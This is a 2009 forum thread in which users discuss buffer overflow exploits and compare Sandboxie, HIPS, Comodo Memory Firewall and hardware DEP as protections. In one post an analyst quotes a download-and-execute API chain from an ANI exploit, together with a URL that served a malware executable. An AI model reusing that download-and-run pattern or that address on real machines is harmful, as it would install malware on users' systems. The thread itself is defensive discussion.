Buffer Overflow attacks?

Discussion in 'other anti-malware software' started by Rivalen, Oct 19, 2009.

Thread Status:
Not open for further replies.
  1. Rivalen

    Rivalen Registered Member

    Joined:
    Oct 18, 2005
    Posts:
    413
    I have an old PC with no DEP. How realistic are Buffer Overflow attacks?

    How can I protect myself? Are there freeware around that works?

    Comments would be great.

    Thanks
     
  2. Meriadoc

    Meriadoc Registered Member

    Joined:
    Mar 28, 2006
    Posts:
    2,642
    Location:
    Cymru
    Some come to mind :

    Heap/Stack Buffer Overflow Monitor
    Memory firewall/Comodo firewall
    WehnTrust
     
  3. Kyle1420

    Kyle1420 Registered Member

    Joined:
    May 27, 2008
    Posts:
    479
    Although BO's are bad.. AFAIK they are not malicious themselves, They open the door for malicious software/actions. I've noticed some AV's Detect the result and sometimes the BO it self. (I found threat fire was particular good at detecting BO's)

    I think that Comodo promotes it's Memory Firewall a lot in marketing terms, Who else advertises this? "Memory Firewall and Buffer Overflows" Sounds technical aye :p

    I know that if I was a noob user and I heard of BO's and CMF for the first time I'd think.. "Hey! My AV doesn't say anything about protecting me from BO's! I'll get this right now to stay safe!"

    ++
    "Oh wait, Looks like I'll have to get the whole suite.. Doesn't come as a standalone program. * Uninstalls AV, Installs Comodo, Installs comodo's toolbar\DNS servers*"

    $$$... But of course that's that 99.99% of companies are all about.. It's understandable.
     
  4. trismegistos

    trismegistos Registered Member

    Joined:
    Jan 29, 2009
    Posts:
    365
    It is because lot of malwares, use 'exploits' taking advantage of certain buffer overflow or remote code execution vulnerabilities.

    To me as well as Rmus, Buffer overflow vulnerabilities, remote or arbitrary code execution vulnerabilities are the same entities with differing in some techno-mumbo jumbo but always with the same end, ie, to 'get inside' or 'to escalate', etc.

    Such are the so called WMF buffer overflow and remote code execution vulnerabilities and exploits, Adobe PDF's, and almost all softwares have their vulnerabilities. Some are patched the sooner they are discovered.

    Regarding Hardware DEP, Comodo Memory firewall as well as the Classical HIPS including sandboxing applications, I have tested all of them against wmf exploits POC's on an clean install unpatched system.

    The POC's simply tried to launch "notepad" or "calculator". Of course, real malwares will use exploits to do more than that, either the usual "download and exec" types w/c is where the money is (where the payloads are easy to detect and nullify using just default-deny policies or similar protections like AE) or anything and everything, w/c is the paranoid concern of mine and SSJ. ha ha

    Out of the 10 or more of the exloits (I can't remember anymore the exact number):

    1) with Hardware DEP, only have successfully intercepted or prevented the executions of both "notepad" or ''calculator" on two counts
    2) with Comodo Memory firewall, likewise intercepted two instances
    3) with a Classical HIPS, intercepted all executions except one explorer crash(so one failure?)
    4) with Sandboxie, all executions of "notepad" or "calculator" were sandboxed with one or two instances where the sandboxed explorer crashed(failure?)

    So in terms of descending order of effectiveness of mitigating buffer overflow or remote code execution's endpoint attacks(in our case the executions of "notepad" or "calculator" via exploits of the already patched old ewf vulnerabilities:

    Sandboxie =/> Classical HIPS > Comodo Memory Firewall =/> Hardware DEP

    In conclusion, Hardware DEP isn't effective as buffer overflow protections. Better use, Sandboxie or any default-deny protections.
     
  5. trismegistos

    trismegistos Registered Member

    Joined:
    Jan 29, 2009
    Posts:
    365
    No problem bro. :)

    Hardware DEP is still very useful and I have it enabled. It would catch every now and then some attempts since I always tried to not update any softwares(including the web browsers) that might eat up space on the miniscule disk of my netbook. Probably, it's time for me to buy a new netbook. :)

    If only Hardware DEP is the Holy Grail, we many never have to need any anti-malwares(sandboxie, etc) or any other anti-virus, or any software and operating system updates or patches.
     
  6. Rivalen

    Rivalen Registered Member

    Joined:
    Oct 18, 2005
    Posts:
    413
    Does free Antivir and Defensewall in combo take care of those exploits?
     
  7. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    Very real. They require an application/DLL that has a vulnerability, and a file to exploit that vulnerability.

    The earliest one I encountered was the Animated Cursor Buffer Overflow in 2004:

    Windows ANI File Parsing Buffer Overflow
    http://research.eeye.com/html/advisories/published/AD20050111.html
    November 15, 2004
    The website had code which downloaded the malformed ANI file. The ANI file caused the DLL to execute code inside the file to download malware:

    Code:
    urlmon.dll_URLDownloadToFileA_WinExec
    http://kunsthandel-schneider.de/daten/dlle.exe
    The recent PDF files exploited a vulnerability in a PDF reader. Running a malformed PDF file through Wepawet reveals the vulnerability and application:

    foxitPDF.gif


    1) Protection against the buffer overflow itself: the malformed file is blocked from exploiting the vulnerability in the application. Several possibilities have already been discussed.

    2) Protection against the installation of the malware if the exploit attempts to download such stuff. Suggestions have already been made for this. This works when the exploit downloads malware.

    It can be argued that preventing 1) above is the most secure, since the exploit code has the potential to do almost anything (execute arbitrary code).

    Others argue that protection against 2) is adequate, since buffer exploits seen in the wild all have the purpose of downloading malware.

    As with all potential security exploits, you make a risk assessment and then decide what preventative measures give you the best peace of mind!

    regards,

    -rich
     
Thread Status:
Not open for further replies.